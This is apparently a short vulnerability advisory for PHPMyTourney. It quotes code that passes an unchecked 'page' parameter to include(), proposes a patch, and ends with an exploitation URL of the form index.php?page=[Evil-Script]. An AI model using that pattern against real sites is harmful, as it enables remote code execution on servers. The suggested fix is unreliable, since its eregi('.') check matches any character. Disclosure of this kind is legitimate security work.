PHPMyTourney Remote file include Vulnerability
Hello
PHPMyTourney Remote file include Vulnerability
Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : security@xxxxxxxxx
home page : http://phpmytourney.sourceforge.net
Script : PHPMyTourney
vulnerable file : phpmytourney/sources/tourney/index.php
code
$page = $_GET['page'];
if(isset($page))
include($page . '.php');
else
echo("must specify a page ");
lines 45-49
fast solution
replace with
if(file_exists($page . '.php') and !eregi(".",$page) and !eregi(":",$page) and
!eregi("/",$page))
{
include($page . '.php');
}
else
{
echo("must specify a page ");
}
phpmytourney/sources/tourney/index.php?page=[Evil-Script]
#WwW.SoQoR.NeT